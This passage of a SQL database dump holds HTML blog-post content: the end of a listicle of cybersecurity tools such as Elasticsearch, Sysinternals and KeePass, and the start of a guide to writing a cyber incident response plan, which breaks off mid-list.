Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Collects and analyzes security logs from IDS, firewalls, and servers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Detects and mitigates threats in real-time.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Investigates incidents and ensures compliance reporting.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">13. <b><strong class=\"font-bold\">Elasticsearch</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A scalable open-source search engine ideal for threat hunting and log management.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Aggregates and analyzes logs from applications, devices, and servers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Allows threat investigation through vast data searches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Improves real-time threat detection with deep data analysis.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">14. <b><strong class=\"font-bold\">Sysinternals Suite</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A set of tools for troubleshooting and analyzing Windows systems.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Diagnoses system issues.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Monitors and controls system processes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Analyzes file system activity to detect risks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Audits the security posture of Windows environments.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">15. <b><strong class=\"font-bold\">KeePass</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">An open-source password manager designed for secure password management.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Securely stores and organizes passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Generates strong, random passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Offers auto-type functionality for web forms.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Shares passwords securely when needed.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">\r\nHow to Use These Tools Effectively</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Integrating cybersecurity tools into your daily practices can seem overwhelming at first, but a few steps can simplify the process. Start by identifying your <b><strong class=\"font-bold\">most vulnerable areas</strong></b>—this could be network security, data encryption, or employee password management. Then, implement tools designed to target those weaknesses.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Small businesses</strong></b> can use tools like KeePass for password management and Nessus for vulnerability scanning.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">IT teams</strong></b> can adopt Splunk for real-time threat monitoring and Metasploit for penetration testing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Individuals</strong></b> can safeguard personal data with tools like Wireshark (for network security) and John the Ripper (to ensure password strength).</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">\r\nThe Future of Cybersecurity Tools</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity industry is rapidly evolving to combat creative and adaptive cyber threats. Here\'s what to watch for in upcoming tools:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">AI-Driven Solutions</strong></b>: Predictive capabilities built into tools like Splunk enable early detection of threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Zero-Trust Policies</strong></b>: Encourage tools such as Forcepoint and other endpoint security measures to limit access before verifying trust.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">More Open-Source Collaborations</strong></b>: Platforms like Kali Linux and Elasticsearch have demonstrated that open-source tools are vital for the cybersecurity community.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Businesses adopting cutting-edge tools will be in a much better position to keep ahead of cybercriminals, ensuring secure systems and improved digital trust.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you’re a seasoned IT professional, a small business owner, or just looking to enhance your personal cybersecurity, these tools empower you to tackle today’s toughest challenges. From password management to penetration testing and everything in between, selecting the right tools is crucial.</p>', '', NULL, NULL, 1, 'draft', '2025-01-19 16:49:15', '2026-01-12 21:41:44', 'Tools', '15 Best Cybersecurity Tools You Need to Know in 2025', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(69, 'How to Create a Cyber Incident Response Plan', 'how-to-create-a-cyber-incident-response-plan', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybercrime is on the rise, impacting organizations of all sizes. With cyber threats becoming increasingly sophisticated, adopting a robust Cyber Incident Response Plan (CIRP) is no longer optional—it\'s essential. Whether you’re an IT professional, a cybersecurity analyst, or a small business owner, having a CIRP in place ensures that your organization is equipped to handle incidents efficiently while minimizing damage.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This guide will walk you through everything you need to know about CIRPs—from their importance to how you can create one tailored to your specific needs.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. What is a Cyber Incident Response Plan (CIRP)?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A Cyber Incident Response Plan is a structured approach to managing and responding to cybersecurity incidents, such as ransomware attacks, phishing attempts, or data breaches. It outlines the roles, responsibilities, and processes an organization must follow to quickly identify, mitigate, and recover from these threats.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">CIRPs are vital not only for large corporations but also for small businesses and individuals who are increasingly becoming targets for hackers. A well-crafted CIRP safeguards critical assets and ensures business continuity during a crisis.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Why Having a CIRP is Crucial</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyber attacks don’t just result in financial losses; they can damage your reputation, erode customer trust, and even result in legal or regulatory consequences. For small businesses, this can be especially crippling—60% of small businesses close within six months following a cyber attack.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A CIRP is your first line of defense. Here’s why it matters:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Minimized Damage</strong></b>: Quick responses help limit the financial and operational impact of an attack.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Improved Team Preparedness</strong></b>: With clearly defined roles and procedures, your team can respond to incidents with confidence.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Regulatory Compliance</strong></b>: Many industries now require businesses to have formal incident response procedures.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Safeguarded Reputation</strong></b>: Proper handling of cyber incidents keeps customer trust intact.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Key Elements of a Comprehensive CIRP</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">An effective CIRP integrates several critical elements. Here’s what to include:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Identifying and Categorizing Incidents</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Not all cyber incidents are the same. Some might involve malware or account compromise, while others may target sensitive data or customer records. Identify potential incident types relevant to your organization and develop a framework for categorizing them by severity and urgency.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Defining Roles and Responsibilities</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Assign clear responsibilities to team members. For instance:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Incident Response Lead</strong></b> coordinates the response activities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">IT Personnel</strong></b> mitigates technical issues.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Legal and Compliance Teams</strong></b> ensure regulatory adherence.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">PR and Communications Teams</strong></b> manage the narrative externally.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This clarity avoids confusion during high-stress situations.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Establishing Communication Strategies</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Effective communication is crucial during an incident. Use pre-defined escalation protocols to inform relevant internal stakeholders and, when necessary, external entities such as customers, the media, or regulatory bodies.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Incident Containment and Eradication</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Contain the threat before eradicating it:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Disconnect affected systems to prevent further damage.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Apply patches to vulnerabilities and remove the malicious elements.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Perform detailed forensics to understand the scope of the attack.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Post-Incident Activities and Analysis</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">After addressing the immediate threat, conduct a post-mortem analysis:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Document the timeline of the incident and actions taken.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Identify areas of improvement in your protocols.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Update your CIRP based on lessons learned.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Cybersecurity Trends and the Future of Incident Response</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">As cyber threats evolve, so must your CIRP. Here are some emerging trends shaping the future of incident response:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">AI and Automation</strong></b> are increasingly being used for threat detection and response, enabling faster reactions to incidents.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Cloud Security</strong></b> has become critical with organizations transitioning to remote work.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Proactive Threat Hunting</strong></b> through cybersecurity tools helps identify vulnerabilities before attackers can exploit them.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Zero Trust Architecture</strong></b> ensures that no user or device is trusted by default, adding an extra layer of security.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Staying on top of these trends is key to adapting your CIRP to future challenges.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. How Small Businesses Can Develop and Implement a CIRP</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Small businesses, often resource-constrained, can still build effective CIRPs by leveraging these strategies:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Simplify</strong></b>: Focus on common threats faced by small businesses, such as phishing and ransomware.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Leverage Technology</strong></b>: Use cost-effective tools for endpoint protection, threat detection, and communication.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Outsource Expertise</strong></b>: Consider partnering with managed security service providers (MSSPs) to develop and enforce your CIRP.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Train Employees</strong></b>: Educate your staff on cybersecurity hygiene and their roles during incidents.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Case Studies: CIRPs in Action</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Case Study 1: Retail Data Breach</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A retail business faced a major data breach, compromising customer credit card information. Thanks to a pre-defined CIRP:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">They quickly shut down affected systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Notified customers and provided resources for credit monitoring.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Updated their systems to prevent future breaches.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Case Study 2: Ransomware Attack</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A small law firm experienced a ransomware attack. Their CIRP allowed them to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Isolate the affected systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Restore data from secured backups.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Work with law enforcement to address the threat.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Both cases highlight the importance of preparedness and having a CIRP in place before incidents occur.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Steps to Create Your Own CIRP</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To create your tailored CIRP, follow these steps:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Perform a Risk Assessment</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Identify critical assets that need protection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Determine common threats and vulnerabilities.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Create an Incident Response Team (IRT)</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Assemble a cross-functional team with IT, legal, and communication experts.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 